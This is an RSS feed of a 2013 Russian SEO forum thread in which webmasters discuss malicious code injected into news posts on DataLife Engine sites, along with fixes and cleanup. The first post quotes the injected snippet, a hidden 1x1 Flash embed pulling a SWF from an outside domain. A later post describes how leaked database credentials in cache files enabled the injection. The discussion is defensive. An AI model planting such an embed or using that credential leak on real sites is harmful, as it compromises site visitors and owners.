<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
	<channel>
		<title><![CDATA[Форум АлаичЪ'а о SEO - Появление постороннего кода в новостях]]></title>
		<link>https://talk.alaev.info/topic/895/</link>
		<atom:link href="https://talk.alaev.info/feed/rss/topic/895/" rel="self" type="application/rss+xml" />
		<description><![CDATA[Недавние сообщения в теме «Появление постороннего кода в новостях».]]></description>
		<lastBuildDate>Tue, 17 Sep 2013 07:32:22 +0000</lastBuildDate>
		<generator>PunBB</generator>
		<item>
			<title><![CDATA[Re: Появление постороннего кода в новостях]]></title>
			<link>https://talk.alaev.info/post/6728/#p6728</link>
			<description><![CDATA[<div class="quotebox"><cite>Hooligan пишет:</cite><blockquote><p>странно, но меня не коснулось, тьфу тьфу тьфу.<br />Больше бы инфы где именно дыра, организовали бы заплатку!</p></blockquote></div><p>Так пофиксили уже. <br /></p><div class="quotebox"><blockquote><p>Суть этой дыры в том что хакер кеширует файл dbconfig , при этом в папке \engine\cache\system создаются кешируемые копии которые можно потом легко считать и узнать логин и пароль к базе, а потом залить в базу что угодно. фикс устраняет эту возможность</p></blockquote></div><p>Меня тоже не коснулось. Даже больше скажу, сайту год. С версии 9.6. Никогда взломов и подобных &quot;приколов&quot; не замечал.</p>]]></description>
			<author><![CDATA[null@example.com (ExVood)]]></author>
			<pubDate>Tue, 17 Sep 2013 07:32:22 +0000</pubDate>
			<guid>https://talk.alaev.info/post/6728/#p6728</guid>
		</item>
		<item>
			<title><![CDATA[Re: Появление постороннего кода в новостях]]></title>
			<link>https://talk.alaev.info/post/6706/#p6706</link>
			<description><![CDATA[<div class="quotebox"><cite>Abrikos пишет:</cite><blockquote><p>Началась целая эпидемия поражения сайтов на DLE, вариаций зараженного кода стало еще больше, вычистить зараженный код, для тех кто не смикает как составить регулярное выражение с поиском и заменой в notepad можно простым перестроением всех новостей на сайте (сам чистил вручную, так что не знаю работает этот способ 100% или нет, но его предложили сами разработчики скрипта), единственное что придется из статических страниц и правил сайта удалить код вручную в админке (в соответствующих пунктах меню). как уже стало ясно тот фикс что предложен разработчиками не помогает и уязвимость остается... Также с созданием первого поста на этом форуме я стартанул топик на серче <a href="http://forum.searchengines.ru/showthread.php?t=811966">http://forum.searchengines.ru/showthread.php?t=811966</a> Там идет бурное обсуждение методов борьбы и всего остального... Присоединяйтесь...</p></blockquote></div><p>странно, но меня не коснулось, тьфу тьфу тьфу.<br />Больше бы инфы где именно дыра, организовали бы заплатку!</p>]]></description>
			<author><![CDATA[null@example.com (Hooligan)]]></author>
			<pubDate>Sat, 14 Sep 2013 15:22:13 +0000</pubDate>
			<guid>https://talk.alaev.info/post/6706/#p6706</guid>
		</item>
		<item>
			<title><![CDATA[Re: Появление постороннего кода в новостях]]></title>
			<link>https://talk.alaev.info/post/6705/#p6705</link>
			<description><![CDATA[<p>Началась целая эпидемия поражения сайтов на DLE, вариаций зараженного кода стало еще больше, вычистить зараженный код, для тех кто не смикает как составить регулярное выражение с поиском и заменой в notepad можно простым перестроением всех новостей на сайте (сам чистил вручную, так что не знаю работает этот способ 100% или нет, но его предложили сами разработчики скрипта), единственное что придется из статических страниц и правил сайта удалить код вручную в админке (в соответствующих пунктах меню). как уже стало ясно тот фикс что предложен разработчиками не помогает и уязвимость остается... Также с созданием первого поста на этом форуме я стартанул топик на серче <a href="http://forum.searchengines.ru/showthread.php?t=811966">http://forum.searchengines.ru/showthread.php?t=811966</a> Там идет бурное обсуждение методов борьбы и всего остального... Присоединяйтесь...</p>]]></description>
			<author><![CDATA[null@example.com (Abrikos)]]></author>
			<pubDate>Sat, 14 Sep 2013 07:36:16 +0000</pubDate>
			<guid>https://talk.alaev.info/post/6705/#p6705</guid>
		</item>
		<item>
			<title><![CDATA[Re: Появление постороннего кода в новостях]]></title>
			<link>https://talk.alaev.info/post/6704/#p6704</link>
			<description><![CDATA[<div class="quotebox"><cite>Abrikos пишет:</cite><blockquote><p>ну а потом по старинке слейте базу и notepad&#039;ом найти и заменить на пустое место</p></blockquote></div><p>А если не секрет то как с помощью блокнота чистить базу. Там же в каждой новости другой код (хотя изменения не большие). Заменять руками 1000 и более строк очевидно очень сложно.<br />Приведите если возможно пример как вы делали.</p>]]></description>
			<author><![CDATA[null@example.com (chessman)]]></author>
			<pubDate>Sat, 14 Sep 2013 02:36:48 +0000</pubDate>
			<guid>https://talk.alaev.info/post/6704/#p6704</guid>
		</item>
		<item>
			<title><![CDATA[Re: Появление постороннего кода в новостях]]></title>
			<link>https://talk.alaev.info/post/6675/#p6675</link>
			<description><![CDATA[<div class="quotebox"><cite>Abrikos пишет:</cite><blockquote><p>Извиняюсь что сам спрашиваю и сам отвечаю, но нашел решение,</p></blockquote></div><p>Совершенно верно, следите за офф заплатками!!!</p>]]></description>
			<author><![CDATA[null@example.com (Hooligan)]]></author>
			<pubDate>Thu, 12 Sep 2013 02:24:58 +0000</pubDate>
			<guid>https://talk.alaev.info/post/6675/#p6675</guid>
		</item>
		<item>
			<title><![CDATA[Появление постороннего кода в новостях]]></title>
			<link>https://talk.alaev.info/post/6668/#p6668</link>
			<description><![CDATA[<p>Добрый день! Редактируя ранее добавленные новости на сайте обнаружил в некоторых постах (в конце поста) появление вот такого кода: </p><div class="codebox"><pre><code>&lt;object classid=&quot;clsid:d27cdb6e-ae6d-11cf-96b8-444553540000&quot; codebase=&quot;http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0&quot; width=&quot;1&quot; height=&quot;1&quot;&gt;&lt;param name=&quot;movie&quot; value=&quot;http://webmasters-yandex.ru/flash.swf?437160373&quot;&gt;&lt;param name=&quot;quality&quot; value=&quot;high&quot;/&gt;&lt;param name=&quot;scale&quot; value=&quot;exactfit&quot;&gt;&lt;param name=&quot;bgcolor&quot; value=&quot;#FFFFFF&quot;/&gt;&lt;param name=&quot;AllowScriptAccess&quot; value=&quot;always&quot;/&gt;&lt;embed src=&quot;http://webmasters-yandex.ru/flash.swf?1024826446&quot; width=&quot;1&quot; height=&quot;1&quot; type=&quot;application/x-shockwave-flash&quot; AllowScriptAccess=&quot;always&quot; pluginspage=&quot;http://www.macromedia.com/go/getflashplayer&quot;&gt;&lt;/embed&gt;&lt;/object&gt;</code></pre></div><p>Откуда это вообще берется? http://webmasters-yandex.ru перенаправляет на панель вэбмастера яндекса, сначала подумал взломали, но адреса то не ведут на какие-то левые сайты (если не считать яндекс левым сайтом)... Прошу помощи...<br /></p><p class="lastedit merged"><em>Добавлено: 11.09.2013 12:54</em></p><p>Извиняюсь что сам спрашиваю и сам отвечаю, но нашел <a href="http://dle-news.ru/bags/v10/1580-potencialnaya-ugroza-v-module-minify.html">решение</a>, да действительно это вредоносный код, у кого та же проблема пройдите по ссылке указанной ранее, внесите изменения, ну а потом по старинке слейте базу и notepad&#039;ом найти и заменить на пустое место... хотя может все уже в курсе этой дырки и я заслоуспочил, если что звиняйте... <img src="https://talk.alaev.info/img/smilies/smile.png" width="15" height="15" alt="smile" /></p>]]></description>
			<author><![CDATA[null@example.com (Abrikos)]]></author>
			<pubDate>Wed, 11 Sep 2013 09:54:57 +0000</pubDate>
			<guid>https://talk.alaev.info/post/6668/#p6668</guid>
		</item>
	</channel>
</rss>
